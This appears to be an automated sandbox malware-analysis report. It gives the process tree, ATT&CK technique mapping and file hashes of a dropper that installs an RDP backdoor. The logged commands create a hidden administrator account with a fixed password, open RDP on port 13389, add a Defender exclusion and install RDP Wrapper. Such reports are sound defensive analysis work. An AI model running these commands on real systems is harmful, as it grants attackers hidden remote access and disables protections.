  "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com" kij
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1076
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Local\Temp\VBJB.vbs" uOKINxfnlY PCXDXpbYfn "C:\Users\Admin\AppData\Local\Temp\fvnW.vbs" "C:\Users\Admin\AppData\Local\Temp\kECQEKom.bat" "C:\Users\Admin\AppData\Local\Temp\phO.dll"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1412
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Local\Temp\VBJB.vbs" uOKINxfnlY PCXDXpbYfn "C:\Users\Admin\AppData\Local\Temp\fvnW.vbs" "C:\Users\Admin\AppData\Local\Temp\kECQEKom.bat" "C:\Users\Admin\AppData\Local\Temp\phO.dll"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1988
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\phO.dll" /tn ETCt
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3892
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\phO.dll" /tn ETCt
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3932
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Local\Temp\VBJB.vbs" uOKINxfnlY PCXDXpbYfn "C:\Users\Admin\AppData\Local\Temp\mTVPm.vbs" "{A49A8B8C-1EB5-4825-97A8-4F8A6B099E59}" "C:\Users\Admin\AppData\Local\Temp\phO.dll"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3548
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Local\Temp\VBJB.vbs" uOKINxfnlY PCXDXpbYfn "C:\Users\Admin\AppData\Local\Temp\mTVPm.vbs" "{A49A8B8C-1EB5-4825-97A8-4F8A6B099E59}" "C:\Users\Admin\AppData\Local\Temp\phO.dll"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3280
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\phO.dll" /tn tilt
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2260
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\phO.dll" /tn tilt
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1864
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\eUSvoNBwxD.bat uOKINxfnlY PCXDXpbYfn"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1008
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3160
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4656
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3024
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4036
    - - C:\Windows\SysWOW64\net.exe
        
        net user uOKINxfnlY PCXDXpbYfn /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3432
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user uOKINxfnlY PCXDXpbYfn /add
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1512
    - - C:\Windows\SysWOW64\net.exe
        
        net localgroup Administrators uOKINxfnlY /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4608
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators uOKINxfnlY /add
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2948
    - - C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" uOKINxfnlY /add
        5⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:2396
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" uOKINxfnlY /add
        6⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:3028
    - - C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4668
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4408
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v uOKINxfnlY /t REG_DWORD /d "00000000" /f
        5⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:1900
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4596
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:5020
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2760
    - - C:\Windows\SysWOW64\timeout.exe
        
        Timeout /t 15
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3304
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\autoupdate.bat"
      4⤵
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:4552
    - - C:\Windows\SysWOW64\fsutil.exe
        
        fsutil dirty query C:
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3280
    - - C:\Windows\SysWOW64\sc.exe
        
        sc queryex "TermService"
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2988
    - - C:\Windows\SysWOW64\find.exe
        
        find "STATE"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3548
    - - C:\Windows\SysWOW64\find.exe
        
        find /v "RUNNING"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1732
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1864
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:4620
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2896
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4468
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1904
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c query session rdp-tcp
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3552
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4352
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3760
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:1280
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4680
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2936
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3668
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3992
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1016
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3180
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4200
      - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4544
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.1202" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2428
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:4768
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4996
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        6⤵
        Blocklisted process makes network request
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:2156
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4504
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5060
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4308
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2136
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3488
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3532

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:2080

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3432

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:1248

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4024

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4672

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\mTVPm.vbs" uOKINxfnlY PCXDXpbYfn "{A49A8B8C-1EB5-4825-97A8-4F8A6B099E59}"
1⤵
PID:2716

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\fvnW.vbs" uOKINxfnlY PCXDXpbYfn "C:\Users\Admin\AppData\Local\Temp\kECQEKom.bat"
1⤵
- Checks computer location settings
PID:2288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\kECQEKom.bat
  2⤵
  - Drops file in System32 directory
  PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
    3⤵
    PID:364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-544" get name /value
      4⤵
      PID:4888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
    3⤵
    PID:4588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-555" get name /value
      4⤵
      PID:3408
- - C:\Windows\system32\net.exe
    net user uOKINxfnlY PCXDXpbYfn /add
    3⤵
    PID:1712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user uOKINxfnlY PCXDXpbYfn /add
      4⤵
      PID:4400
- - C:\Windows\system32\net.exe
    net localgroup Administrators uOKINxfnlY /add
    3⤵
    PID:5020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators uOKINxfnlY /add
      4⤵
      PID:2896
- - C:\Windows\system32\net.exe
    net localgroup Remote Desktop Users uOKINxfnlY /add
    3⤵
    PID:3628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Remote Desktop Users uOKINxfnlY /add
      4⤵
      PID:3432
- - C:\Windows\system32\net.exe
    net accounts /maxpwage:unlimited
    3⤵
    PID:3784
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 accounts /maxpwage:unlimited
      4⤵
      PID:660
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v uOKINxfnlY /t REG_DWORD /d "00000000" /f
    3⤵
    - Hide Artifacts: Hidden Users
    PID:3264
- - C:\Windows\system32\reg.exe
    reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
    3⤵
    PID:396
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3840
- - C:\Windows\system32\timeout.exe
    Timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:2148

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\fvnW.vbs" uOKINxfnlY PCXDXpbYfn "C:\Users\Admin\AppData\Local\Temp\kECQEKom.bat"
1⤵
- Checks computer location settings
PID:3692
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\kECQEKom.bat
  2⤵
  - Drops file in System32 directory
  PID:2852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
    3⤵
    PID:3556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-544" get name /value
      4⤵
      PID:3900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
    3⤵
    PID:5008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-555" get name /value
      4⤵
      PID:3280
- - C:\Windows\system32\net.exe
    net user uOKINxfnlY PCXDXpbYfn /add
    3⤵
    PID:1244
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user uOKINxfnlY PCXDXpbYfn /add
      4⤵
      PID:3860
- - C:\Windows\system32\net.exe
    net localgroup Administrators uOKINxfnlY /add
    3⤵
    PID:3244
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators uOKINxfnlY /add
      4⤵
      PID:2260
- - C:\Windows\system32\net.exe
    net localgroup Remote Desktop Users uOKINxfnlY /add
    3⤵
    PID:4060
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Remote Desktop Users uOKINxfnlY /add
      4⤵
      PID:4120
- - C:\Windows\system32\net.exe
    net accounts /maxpwage:unlimited
    3⤵
    PID:2716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 accounts /maxpwage:unlimited
      4⤵
      PID:3236
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v uOKINxfnlY /t REG_DWORD /d "00000000" /f
    3⤵
    - Hide Artifacts: Hidden Users
    PID:5116
- - C:\Windows\system32\reg.exe
    reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
    3⤵
    PID:4036
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1064
- - C:\Windows\system32\timeout.exe
    Timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:3024

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\mTVPm.vbs" uOKINxfnlY PCXDXpbYfn "{A49A8B8C-1EB5-4825-97A8-4F8A6B099E59}"
1⤵
PID:4956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Hide Artifacts

T1564

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wrapper\RDPWInst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

SHA512
c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

Download Submit
C:\Program Files\RDP Wrapper\autoupdate.bat

Filesize
12KB

MD5
b365fde3be7855f4254d1e4bba45d260

SHA1
b56c6f0402b25c5d68e3a722144f5f4b5bb53d27

SHA256
2a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360

SHA512
d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026

Download Submit
C:\Program Files\RDP Wrapper\rdpwrap_new.ini

Filesize
181KB

MD5
12afc3fd401d3724956283c33eb796eb

SHA1
66b875153e6ee45c76ae374a95e2cec013ac94e8

SHA256
370681b06f7f69461f745e0ef232c7e69aa6b91a9322903ea1150ba8b2eca120

SHA512
d9957669907fb20b3a3c12770574bacc51de14de8bce426292a0c95131fb354ab369e12303c01b8d3dc394ac3e30371b2d2c3744840a86b296f8938f747cffa4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
471B

MD5
12453de1fadd1fc8885f18484126d603

SHA1
a94da57403903bdf11770dddfb05039fd70276d3

SHA256
debfccc3b29203f9fd710490cf35c0ce919016bb008c47a787ae64e58503d4d2

SHA512
2c00a2e574fa225f51832e3f2d0975189999b814cd840af87800985fad14001b9611ce9fb71858d3f09183b9dd7f70c25dfbd73e0a868318878a35ac231bdf1e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
412B

MD5
f1d87aa1617295ca06d63ec134d208ee

SHA1
7a6d9f88bd48938b0a7b5dcf5946df33d307995c

SHA256
31bbc9eb22dfa3b85305b739e53bd22e0b492da50fbafd53a4d37920b2eb6140

SHA512
f5555452c43bddc4894c4f5b327260320c835506483595d871c2b00cfecc3fac184bd1561c0db4d08cda88de2706bfda4c15cd04c8e2e4b95111d4baa816dd44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
609b3492b2fbc5c1530fe9957d4cc79a

SHA1
66458943993f18041a8d5338b692e0d1086c3598

SHA256
a8b3d527befeb8dd2804d5e050c5f1971f0bf4ff68db2a44b4b4d3d7c6db6930

SHA512
18d2983ed452b47d85b2fc0b5f45cc243d8d6fa6a726af3c8d451075f0a4eca2748fd701d5d0e172388d3ae2f598ab71ebdec58d39ea63e87b307dedfa6ee111

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\BkHZX.com

Filesize
112KB

MD5
a5d8717cba5777995ffd023b73a051e4

SHA1
1bbe2cf40a46f40b9772033bc9a802d0028a9094

SHA256
33b05d86169ce170e891b2bf79384efc92c12f212d81ee2b4af4d86a83f42395

SHA512
3d113aa2781915dbcffe40ffa09d96bf6d7111b2b8e767deac7243dd015d1da060663504a6481590e3302168f4fd1f0c63cefa51bd1c63da682db32dc4b6462e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\EgOSu.com

Filesize
1.9MB

MD5
b92b3cd722985f21af5e780ddaf8ec9f

SHA1
41fa6e293af5a90889716dac883f57e5dc34daba

SHA256
5585b1eedd3110391303f0cf3936f247386b1e688452cbd4f403abcb504adcbd

SHA512
eb057608e1daf916833b76dac08b0afa5572c7678f66afabf8caa35bbd688c0cf45a047d364536b343e384c3462a958f7a0b083c1fab63965076db55e9abdfb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\grom

Filesize
455KB

MD5
58a110bcbec45ff600f9bc0d7e98471f

SHA1
c8514f0be76aec9a3fd0108ba7a672cb6db56b05

SHA256
94bf83acfe6d997b12caffa86c59278f5b4765735047b836016ec2073fd5a196

SHA512
